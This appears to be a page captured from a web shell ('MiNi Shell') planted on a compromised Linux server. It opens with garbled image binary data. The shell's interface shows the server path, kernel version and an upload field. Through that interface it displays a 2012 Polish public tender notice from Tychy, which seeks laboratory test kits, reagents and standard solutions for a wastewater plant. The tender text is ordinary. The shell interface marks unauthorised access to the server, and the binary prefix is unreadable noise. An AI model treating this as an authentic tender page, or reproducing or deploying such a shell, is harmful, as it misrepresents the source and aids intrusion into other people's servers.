JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121221/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121221/270485-N-2012.html

<p class="kh_header"><b>Tychy: Dostawa testów kuwetowych, testów odczynnikowych, odczynników, akcesoriów laboratoryjnych i roztworów wzorcowych na Oczyszczalnię Ścieków w Tychach-Urbanowicach</b><br>
<b>Numer ogłoszenia: 270485 - 2012; data zamieszczenia: 21.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalne Centrum Gospodarki Wodno-Ściekowej S.A. , Al. J. Marszałka Piłsudskiego 12, 43-100 Tychy, woj. śląskie, tel. 032 3257235, faks 032 3257285.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rcgw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Osoba prawna utworzona w celu zaspakajania potrzeb o charakterze powszechnym.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa testów kuwetowych, testów odczynnikowych, odczynników, akcesoriów laboratoryjnych i roztworów wzorcowych na Oczyszczalnię Ścieków w Tychach-Urbanowicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres przedmiotu zamówienia obejmuje:
- w części 1 zamówienia dostawę testów kuwetowych,
- w części 2 zamówienia dostawę testów odczynnikowych,
- w części 3 zamówienia dostawę odczynników chemicznych i laboratoryjnych, 
- w części 4 zamówienia dostawę akcesoriów laboratoryjnych,
- w części 5 zamówienia dostawę roztworów wzorcowych.

Informacje szczegółowe dotyczące zamówienia:
Część 1 zamówienia (testy kuwetowe) 
1.Dostawy testów kuwetowych będą realizowane sukcesywnie, po otrzymaniu przez Wykonawcę pisemnego zamówienia Zamawiającego.
2.Testy kuwetowe muszą posiadać kod kreskowy umożliwiający odczytanie danego testu przez spektrofotometr firmy HACH LANGE DR2800.
3.Testy kuwetowe muszą być dostarczane z kartą charakterystyki, certyfikatem analizy i metodyką wykonywania w języku polskim.
4.Zamawiający nie dopuszcza doliczania kaucji za opakowania, w których znajdują się substancje niebezpieczne do ceny jednostkowej netto oferowanego asortymentu.
5.Zużyte test kuwetowe będą odbierane przez dostawcę bez dodatkowych opłat.

Część 2 zamówienia (testy odczynnikowe) 
1.Dostawy testów odczynnikowych będą realizowane sukcesywnie, po otrzymaniu przez Wykonawcę pisemnego zamówienia Zamawiającego.
2.Testy odczynnikowe muszą być kompatybilne ze spektrofotometrem HACH LANGE DR2800.
3.Testy odczynnikowe muszą być dostarczane z kartą charakterystyki, certyfikatem analizy i metodyką wykonywania w języku polskim.
4.Zamawiający nie dopuszcza doliczania kaucji za opakowania, w których znajdują się substancje niebezpieczne do ceny jednostkowej netto oferowanego asortymentu.

Część 3 zamówienia (odczynniki chemiczne i laboratoryjne) 
1.Dostawy odczynników chemicznych i laboratoryjnych będą realizowane w miarę potrzeb, po otrzymaniu przez Wykonawcę pisemnego zamówienia Zamawiającego.
2.Odczynniki chemiczne muszą być dostarczane z kartą charakterystyki i świadectwem jakości.
3.Zamawiający nie dopuszcza doliczania kaucji za opakowania, w których znajdują się substancje niebezpieczne do ceny jednostkowej netto oferowanego asortymentu. 

Część 4 zamówienia (akcesoria laboratoryjne) 
1.Dostawy akcesoriów laboratoryjnych będą realizowane w miarę potrzeb, po otrzymaniu przez Wykonawcę pisemnego zamówienia Zamawiającego.
2.Szkło miarowe musi być dostarczone z certyfikatem jakości serii.

Część 5 zamówienia (roztwory wzorcowe) 
1.Dostawy roztworów wzorcowych będą realizowane w miarę potrzeb, po otrzymaniu przez wykonawcę pisemnego zamówienia Zamawiającego.
2.Zamawiający nie dopuszcza doliczania kaucji za opakowania, w których znajdują się substancje niebezpieczne do ceny jednostkowej netto oferowanego asortymentu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 33.69.63.00-8, 38.43.70.00-7, 33.79.30.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Część 1 zamówienia - 1000,00 PLN, słownie: tysiąc złotych;
Część 2 zamówienia - 150,00 PLN, słownie: sto złotych;
Część 3 zamówienia - 100,00 PLN, słownie: sto złotych;
Część 4 zamówienia - 150,00 PLN, słownie: sto złotych;
Na część 5 zamówienia Zamawiający nie wymaga wniesienia wadium przez Wykonawców</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca ubiegający się o zamówienie publiczne spełni w/w warunek jeżeli załączy do oferty wypełnione i podpisane oświadczenie - załącznik nr 2 do siwz.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca ubiegający się o zamówienie publiczne spełni w/w warunek jeżeli załączy do oferty wypełnione i podpisane oświadczenie - załącznik nr 2 do siwz oraz wykaz wykonanych dostaw (załącznik nr 5A/5B,5C,5D,5E do siwz - w zależności od części, na którą Wykonawca składa ofertę), w którym potwierdzi, iż należycie wykonał: 
1)	Część 1 zamówienia:
Dostawę testów kuwetowych o wartości co najmniej 30 000,00 zł netto, wykonaną (zakończoną) w okresie ostatnich 3 lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -w tym okresie, z podaniem jej wartości, przedmiotu, dat wykonania i odbiorcy oraz załączeniem dokumentu, potwierdzającego, że dostawa ta została wykonana należycie - dla  Wykonawców składających ofertę na część 1 zamówienia.
2)	Część 2 zamówienia:
Dostawę testów odczynnikowych o wartości co najmniej 8 000,00 zł netto, wykonaną (zakończoną) w okresie ostatnich 3 lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -w tym okresie, z podaniem jej wartości, przedmiotu, dat wykonania i odbiorcy oraz załączeniem dokumentu, potwierdzającego, że dostawa ta została wykonana należycie - dla  Wykonawców składających ofertę na część 2 zamówienia, 
3)	Część 3 zamówienia:
Dostawę odczynników chemicznych i laboratoryjnych o wartości co najmniej 5 000,00 zł netto, wykonaną (zakończoną) w okresie ostatnich 3 lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -w tym okresie, z podaniem jej wartości, przedmiotu, dat wykonania i odbiorcy oraz załączeniem dokumentu, potwierdzającego, że dostawa ta została wykonana należycie - dla  Wykonawców składających ofertę na część 3 zamówienia. 
4)	Część 4 zamówienia:
Dostawę akcesoriów laboratoryjnych o wartości co najmniej 8 000,00 zł netto, wykonaną (zakończoną) w okresie ostatnich 3 lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -w tym okresie, z podaniem jej wartości, przedmiotu, dat wykonania i odbiorcy oraz załączeniem dokumentu, potwierdzającego, że dostawa ta została wykonana należycie - dla  Wykonawców składających ofertę na część 4 zamówienia. 
5)	Część 5 zamówienia:
Dostawę roztworów wzorcowych o wartości co najmniej 1 000,00 zł netto, wykonaną (zakończoną) w okresie ostatnich 3 lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -w tym okresie, z podaniem jej wartości, przedmiotu, dat wykonania i odbiorcy oraz załączeniem dokumentu, potwierdzającego, że dostawa ta została wykonana należycie - dla  Wykonawców składających ofertę na część 5 zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca ubiegający się o zamówienie publiczne spełni w/w warunek jeżeli załączy do oferty wypełnione i podpisane oświadczenie - załącznik nr 2 do siwz.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca ubiegający się o zamówienie publiczne spełni w/w warunek jeżeli załączy do oferty wypełnione i podpisane oświadczenie - załącznik nr 2 do siwz.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca ubiegający się o zamówienie publiczne spełni w/w warunek jeżeli załączy do oferty wypełnione i podpisane oświadczenie - załącznik nr 2 do siwz.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1)	Oświadczenie w zakresie wyrobów medycznych (dot. części 4 zamówienia)- załącznik nr 7 do siwz.
2)	Oświadczenie w zakresie kompatybilności testów odczynnikowych ze spektrofotometrem HACH LANGE DR2800 (dot. części 2 zamówienia) - załącznik nr 8 do siwz</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Formularz Oferty, sporządzony na podstawie wzoru - załącznik nr 1 do siwz
2)	Zestawienie cenowe zaoferowanego przedmiotu zamówienia - załączniki 1A/1B/1C/1D/1E (w zależności od części, na którą Wykonawca składa ofertę).
3)	Upoważnienie dla osoby/osób do podpisania oferty oraz do występowania w imieniu Wykonawcy, jeżeli nie wynika to z innych dołączonych dokumentów - załącznik nr 4 do siwz.
4)	Kserokopia dowodu wniesienia wadium - dla części 1,2,3,4 zamówienia.
5)	Jeżeli Wykonawca wykazując spełnienie warunków, o których mowa w art.22 ust.1 u.p.z.p. polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust.2b u.p.z.p., zobowiązany jest wykazać, że w stosunku do tych podmiotów brak jest podstaw do wykluczenia z postępowania o udzielenie zamówienia poprzez złożenie razem z ofertą wymaganych dokumentów potwierdzających brak podstaw do wykluczenia określonych w pkt.VI.2 ust.1-2 siwz dotyczących każdego z tych podmiotów, o ile podmioty te będą brały udział w realizacji części zamówienia.    
6)	Wzór pisemnego zobowiązania innego podmiotu w zakresie wiedzy i doświadczenia - załącznik nr 5F do siwz.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana umowy jest dopuszczalna w następujących przypadkach:
a)Konieczność wprowadzenia zmian do umowy w następstwie siły wyższej tj. zdarzenia zewnętrznego, niemożliwego do przewidzenia m.in. katastrofa naturalna, katastrofalne działania przyrody np. ulewne opady deszczu, nadzwyczaj obfite opady śniegu, niezwykłe mrozy, strajk, zamieszki uliczne, pożar, powódź, eksplozja, atak terrorystyczny.
b)Jeżeli nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rcgw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Regionalne Centrum Gospodarki Wodno Ściekowej S.A., 
Al. Marszałka J. Piłsudskiego 12, 43-100 Tychy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.01.2013 godzina 10:00, miejsce: Ww siedzibie Regionalnego Centrum Gospodarki Wodno-Ściekowej S.A. w Tychach przy Al. Marszałka Piłsudskiego 12, pokój nr 414-Sekretariat, IV piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów oraz zawarcia umowy ramowej. Zamówienie nie dotyczy finansowania projektu/programu ze środków Unii Europejskiej. Data zamieszczenia niniejszego ogłoszenia w Biuletynie Zamówień Publicznych 21.12.2012r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com